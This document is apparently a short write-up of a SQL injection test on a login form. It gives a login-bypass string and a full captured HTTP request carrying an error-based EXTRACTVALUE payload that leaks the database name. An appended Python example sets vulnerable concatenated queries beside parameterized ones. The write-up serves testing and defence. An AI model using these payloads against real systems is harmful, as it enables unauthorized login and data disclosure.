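Capture the request at the login point.
The SQL statements turned out to be directly exposed, so I tried a universal password: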
admin' or '1'='1--q
1
Login succeeded.
There is not much functionality available after login, but error-based injection is possible:
POST /v1/mysqlServlet/mongoSql?random=0.6745034416624898 HTTP/1.1
Host:
Connection: keep-alive
Content-Length: 148
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Origin:
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
PF=simulationDataResources&sqlfile=simulationTrain%2Flogin_check.json&userId=&userName=admin' AND (SELECT 1 FROM (SELECT EXTRACTVALUE(1, CONCAT(0x5c, (SELECT DATABASE())))) y) AND '1'='1&conditions%5BPASSWD%5D=c4ca4238a0b923820dcc509a6f75849b
The error message reveals the database name.
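
The fix for both findings above, as an added example that is not part of the original post or the application's code: the login check with values concatenated into the SQL beside the same check with bound parameters, plus a handler that never returns database error text. It uses Python's sqlite3 in place of the application's MySQL backend, and the table name, column names and stored password are assumptions.

```python
import hashlib
import logging
import sqlite3

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (USERNAME TEXT, PASSWD TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", md5_hex("constructed-password")))
    return db

def login_concat(db, user_name, passwd_hash):
    # Vulnerable pattern: request values are pasted into the SQL text.
    sql = ("SELECT USERNAME FROM users WHERE USERNAME='" + user_name
           + "' AND PASSWD='" + passwd_hash + "'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, user_name, passwd_hash):
    # Hardened form: placeholders keep both values as data, never as SQL.
    sql = "SELECT USERNAME FROM users WHERE USERNAME=? AND PASSWD=?"
    return db.execute(sql, (user_name, passwd_hash)).fetchone() is not None

def handle_login(db, check, user_name, passwd_hash):
    # Only fixed strings reach the client; database error text goes to
    # the server log, so an error-based probe gets nothing back.
    try:
        ok = check(db, user_name, passwd_hash)
    except sqlite3.Error as exc:
        logging.getLogger("login").warning("login query failed: %s", exc)
        return "invalid credentials"
    return "ok" if ok else "invalid credentials"

if __name__ == "__main__":
    db = make_db()
    bypass = "admin' or '1'='1--q"   # user name value from the write-up
    wrong = md5_hex("1")             # the PASSWD value in the captured request
    print("concatenated:", handle_login(db, login_concat, bypass, wrong))
    print("bound:       ", handle_login(db, login_bound, bypass, wrong))
    print("stray quote: ", handle_login(db, login_concat, "admin'", wrong))
```

The generic error response only hides the leak channel; the bound query is what removes the injection.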